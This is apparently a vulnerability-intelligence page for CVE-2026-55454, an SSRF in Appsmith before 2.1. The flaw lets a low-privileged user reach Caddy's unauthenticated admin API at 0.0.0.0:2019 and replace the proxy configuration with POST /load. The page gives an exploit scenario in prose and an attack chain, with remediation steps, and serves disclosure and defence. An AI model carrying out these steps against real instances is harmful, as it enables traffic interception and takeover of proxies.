Skip to main content

Appsmith EUVD-2026-39118

| CVE-2026-55454 CRITICAL
Exposed Dangerous Method or Function (CWE-749)
2026-06-24 GitHub_M
SSRF Docker Appsmith
9.9
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.9 CRITICAL

Low-priv authenticated user (PR:L) drives an SSRF over the network (AV:N/AC:L); reverse-proxy takeover is a scope change (S:C) with full C/I/A compromise of fronted traffic.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Patch available
Jun 24, 2026 - 23:03 EUVD
Analysis Generated
Jun 24, 2026 - 22:25 vuln.today
CVE Published
Jun 24, 2026 - 21:38 cve.org
CRITICAL 9.9

DescriptionCVE.org

Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 2.1, the bundled Caddy reverse-proxy's admin API - which has no authentication by default - is bound on 0.0.0.0:2019 inside the container. While this listener is not directly published to the host by docker-compose.yml, it is reachable from the Appsmith server process itself or a SSRF vulnerability. An authenticated low-privileged user can therefore drive the SSRF to issue POST /load (or any other admin-API call) against http://0.0.0.0:2019/, fully replacing the live Caddy configuration and taking over the reverse proxy. This vulnerability is fixed in 2.1.

Articles & Coverage 1

News Critical SSRF to Reverse-Proxy Takeover in Appsmith/Docker - CVE-2026-55454 Jun 24, 2026

AnalysisAI

Reverse-proxy takeover in Appsmith versions prior to 2.1 lets an authenticated low-privileged user abuse server-side request forgery to reach the bundled Caddy admin API, which ships with no authentication and listens on 0.0.0.0:2019 inside the container. By forcing the Appsmith server to issue a POST /load to that internal endpoint, the attacker rewrites the live Caddy configuration and seizes control of the reverse proxy that fronts the application. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate as low-privileged Appsmith user
Delivery
Configure data source/API pointing at internal 0.0.0.0:2019
Exploit
Drive SSRF: server sends POST /load to Caddy admin API
Execution
Replace live Caddy configuration
Impact
Take over reverse proxy and intercept/redirect traffic
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated low-privileged Appsmith account (CVSS PR:L) on a version prior to 2.1 deployed via the bundled Docker image where Caddy's admin API is bound to 0.0.0.0:2019, plus a usable SSRF primitive that coerces the Appsmith server process to issue requests to that internal endpoint (e.g., abusing data-source/outbound-request features). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The published CVSS:3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H = 9.9) reflects a network-reachable, low-complexity attack needing only low privileges, with a scope change because compromising Caddy affects a component beyond the vulnerable backend. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A low-privileged user logs into a self-hosted Appsmith instance and configures a data source or REST API action pointing at http://0.0.0.0:2019/load, then triggers the Appsmith server to send a crafted POST containing attacker-chosen Caddy JSON configuration. Caddy accepts the unauthenticated request and reloads, handing the attacker control of the reverse proxy so they can intercept or redirect all traffic and serve malicious content. …
Remediation Upgrade to Appsmith 2.1 or later, which is the vendor-released patch that corrects the Caddy admin-API binding (Vendor-released patch: 2.1; see GHSA-8jvv-gwqg-6vjc at https://github.com/appsmithorg/appsmith/security/advisories/GHSA-8jvv-gwqg-6vjc). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

24 hours: Inventory all Appsmith instances and confirm version levels; enable logging for reverse-proxy configuration changes and port 2019 access; restrict network egress from containers to block internal SSRF. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-52813 CRITICAL
10.0 Jun 23

Remote code execution in Gogs self-hosted Git service before 0.14.3 allows unauthenticated attackers (where self-registr
CVE-2026-54350 CRITICAL
10.0 Jun 23

Unauthenticated NoSQL operator injection in Budibase self-hosted server (@budibase/server <= 3.39.0) allows anonymous vi
CVE-2026-52806 CRITICAL
9.9 Jun 23

Remote code execution in Gogs through 0.14.2 allows authenticated users (and unauthenticated attackers on default-config
CVE-2026-54352 CRITICAL
9.6 Jun 22

Arbitrary file read in Budibase self-hosted server (@budibase/server <= 3.39.0) allows an authenticated workspace builde
CVE-2026-56265 CRITICAL
9.3 Jun 21

Authentication bypass in Crawl4AI Docker API server (versions prior to 0.8.7) allows remote unauthenticated attackers to

Share

EUVD-2026-39118 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy